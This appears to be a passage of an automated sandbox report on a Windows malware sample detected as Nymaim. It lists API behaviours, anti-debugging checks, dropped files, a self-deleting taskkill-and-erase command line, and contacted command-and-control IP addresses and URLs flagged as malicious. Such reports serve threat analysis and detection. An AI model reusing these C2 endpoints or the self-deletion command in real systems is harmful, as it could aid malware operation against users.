Source: C:\Program Files (x86)\Split Files\HitFiles134.exe Code function: 2_2_0041336B IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 2_2_0041336B
Source: C:\Program Files (x86)\Split Files\HitFiles134.exe Code function: 2_2_0040F5F5 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 2_2_0040F5F5
Source: C:\Program Files (x86)\Split Files\HitFiles134.exe Code function: 2_2_0040EBD2 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 2_2_0040EBD2
Source: C:\Program Files (x86)\Split Files\HitFiles134.exe Code function: 2_2_10006180 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 2_2_10006180
Source: C:\Program Files (x86)\Split Files\HitFiles134.exe Code function: 2_2_100035DF SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 2_2_100035DF
Source: C:\Program Files (x86)\Split Files\HitFiles134.exe Code function: 2_2_10003AD4 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 2_2_10003AD4
Contains functionality to launch a program with higher privileges
Source: C:\Users\user\AppData\Local\Temp\is-OVJ5O.tmp\file.tmp Code function: 1_2_0047697C ShellExecuteEx,GetLastError,MsgWaitForMultipleObjects,GetExitCodeProcess,CloseHandle, 1_2_0047697C
Uses taskkill to terminate processes
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /im "HitFiles134.exe" /f Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Program Files (x86)\Split Files\HitFiles134.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c taskkill /im "HitFiles134.exe" /f & erase "C:\Program Files (x86)\Split Files\HitFiles134.exe" & exit Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /im "HitFiles134.exe" /f Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-OVJ5O.tmp\file.tmp Code function: 1_2_0042DF24 AllocateAndInitializeSid,GetVersion,GetModuleHandleA,GetProcAddress,CheckTokenMembership,GetCurrentThread,OpenThreadToken,GetLastError,GetCurrentProcess,OpenProcessToken,GetTokenInformation,GetLastError,GetTokenInformation,EqualSid,CloseHandle,FreeSid, 1_2_0042DF24
Source: HitFiles134.exe, 00000002.00000002.332310756.00000000034CF000.00000004.00000010.00020000.00000000.sdmp Binary or memory string: Program Manager
Source: HitFiles134.exe, 00000002.00000002.332310756.00000000034CF000.00000004.00000010.00020000.00000000.sdmp Binary or memory string: program manager
Source: HitFiles134.exe, 00000002.00000002.332310756.00000000034CF000.00000004.00000010.00020000.00000000.sdmp Binary or memory string: F.program manager
Contains functionality to query locales information (e.g. system language)
Source: C:\Users\user\Desktop\file.exe Code function: GetLocaleInfoA, 0_2_0040515C
Source: C:\Users\user\Desktop\file.exe Code function: GetLocaleInfoA, 0_2_004051A8
Source: C:\Users\user\AppData\Local\Temp\is-OVJ5O.tmp\file.tmp Code function: GetLocaleInfoA, 1_2_004084D0
Source: C:\Users\user\AppData\Local\Temp\is-OVJ5O.tmp\file.tmp Code function: GetLocaleInfoA, 1_2_0040851C
Source: C:\Program Files (x86)\Split Files\HitFiles134.exe Code function: GetKeyboardLayoutList,GetLocaleInfoA,__Init_thread_footer, 2_2_00404D40
Source: C:\Program Files (x86)\Split Files\HitFiles134.exe Code function: EnumSystemLocalesW, 2_2_00427041
Source: C:\Program Files (x86)\Split Files\HitFiles134.exe Code function: EnumSystemLocalesW, 2_2_0042708C
Source: C:\Program Files (x86)\Split Files\HitFiles134.exe Code function: EnumSystemLocalesW, 2_2_00427127
Source: C:\Program Files (x86)\Split Files\HitFiles134.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW, 2_2_004271B2
Source: C:\Program Files (x86)\Split Files\HitFiles134.exe Code function: EnumSystemLocalesW, 2_2_0041E2FF
Source: C:\Program Files (x86)\Split Files\HitFiles134.exe Code function: GetLocaleInfoW, 2_2_00427405
Source: C:\Program Files (x86)\Split Files\HitFiles134.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP, 2_2_0042752B
Source: C:\Program Files (x86)\Split Files\HitFiles134.exe Code function: GetLocaleInfoW, 2_2_00427631
Source: C:\Program Files (x86)\Split Files\HitFiles134.exe Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW, 2_2_00427700
Source: C:\Program Files (x86)\Split Files\HitFiles134.exe Code function: GetLocaleInfoW, 2_2_0041E821
Source: C:\Program Files (x86)\Split Files\HitFiles134.exe Code function: GetACP,IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW, 2_2_00426D9F
Contains functionality to query CPU information (cpuid)
Source: C:\Program Files (x86)\Split Files\HitFiles134.exe Code function: 2_2_0040F7F3 cpuid 2_2_0040F7F3
Source: C:\Users\user\AppData\Local\Temp\is-OVJ5O.tmp\file.tmp Code function: 1_2_004576D8 GetTickCount,QueryPerformanceCounter,GetSystemTimeAsFileTime,GetCurrentProcessId,CreateNamedPipeA,GetLastError,CreateFileA,SetNamedPipeHandleState,CreateProcessA,CloseHandle,CloseHandle, 1_2_004576D8
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_004026C4 GetSystemTime, 0_2_004026C4
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00405C44 GetVersionExA, 0_2_00405C44
Source: C:\Users\user\AppData\Local\Temp\is-OVJ5O.tmp\file.tmp Code function: 1_2_00454724 GetUserNameA, 1_2_00454724

Stealing of Sensitive Information
barindex
Yara detected Nymaim
Source: Yara match File source: 2.2.HitFiles134.exe.32d0000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.HitFiles134.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.HitFiles134.exe.32d0000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.HitFiles134.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000002.00000002.332146458.0000000003330000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.330440301.0000000000400000.00000040.00000001.01000000.00000006.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.332003406.00000000032D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 780214 Sample: file.exe Startdate: 08/01/2023 Architecture: WINDOWS Score: 100 48 45.139.105.1 CMCSUS Italy 2->48 50 85.31.46.167 CLOUDCOMPUTINGDE Germany 2->50 52 Snort IDS alert for network traffic 2->52 54 Antivirus detection for URL or domain 2->54 56 Detected unpacking (changes PE section rights) 2->56 58 4 other signatures 2->58 10 file.exe 2 2->10         started        signatures3 process4 file5 32 C:\Users\user\AppData\Local\Temp\...\file.tmp, PE32 10->32 dropped 62 Obfuscated command line found 10->62 14 file.tmp 17 23 10->14         started        signatures6 process7 file8 34 C:\Users\user\AppData\Local\...\_setup64.tmp, PE32+ 14->34 dropped 36 C:\Users\user\AppData\Local\...\_iscrypt.dll, PE32 14->36 dropped 38 C:\Users\user\AppData\Local\...\_RegDLL.tmp, PE32 14->38 dropped 40 4 other files (3 malicious) 14->40 dropped 17 HitFiles134.exe 24 14->17         started        process9 dnsIp10 42 107.182.129.235, 49713, 80 META-ASUS Reserved 17->42 44 171.22.30.106, 49714, 80 CMCSUS Germany 17->44 46 45.139.105.171, 49712, 80 CMCSUS Italy 17->46 30 C:\Users\user\AppData\...\3JCCsnPwg.exe, PE32 17->30 dropped 21 3JCCsnPwg.exe 17->21         started        24 cmd.exe 1 17->24         started        file11 process12 signatures13 60 Multi AV Scanner detection for dropped file 21->60 26 taskkill.exe 1 24->26         started        28 conhost.exe 24->28         started        process14
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
45.139.105.171
 unknown Italy
33657 CMCSUS true
45.139.105.1
 unknown Italy
33657 CMCSUS true
85.31.46.167
 unknown Germany
43659 CLOUDCOMPUTINGDE true
107.182.129.235
 unknown Reserved
11070 META-ASUS true
171.22.30.106
 unknown Germany
33657 CMCSUS true

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://45.139.105.171/itsnotmalware/count.php?sub=NOSUB&stream=mixtwo&substream=mixinte true
  • URL Reputation: safe
 unknown
http://107.182.129.235/storage/ping.php true
  • URL Reputation: safe
 unknown
http://171.22.30.106/library.php true
  • URL Reputation: malware
 unknown
http://107.182.129.235/storage/extension.php true
  • URL Reputation: safe
 unknown